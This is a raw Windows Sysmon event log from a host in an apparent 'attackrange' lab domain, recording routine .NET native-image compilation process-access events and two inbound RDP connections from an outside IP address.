14:57:48.842{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-5A0D-00000000BB01}3932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.826{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.826{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.764{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-590D-00000000BB01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.748{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.748{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.701{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-580D-00000000BB01}4512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.686{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.686{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.639{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-570D-00000000BB01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.623{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000076186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.479{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-44832-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000076185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:47.409{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-47562-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.592{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-560D-00000000BB01}184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.576{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.576{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.545{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-550D-00000000BB01}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.530{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.530{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.483{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-540D-00000000BB01}3856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.467{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEC-607E-540D-00000000BB01}3856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.467{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEC-607E-540D-00000000BB01}3856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.420{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-530D-00000000BB01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.420{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEC-607E-530D-00000000BB01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 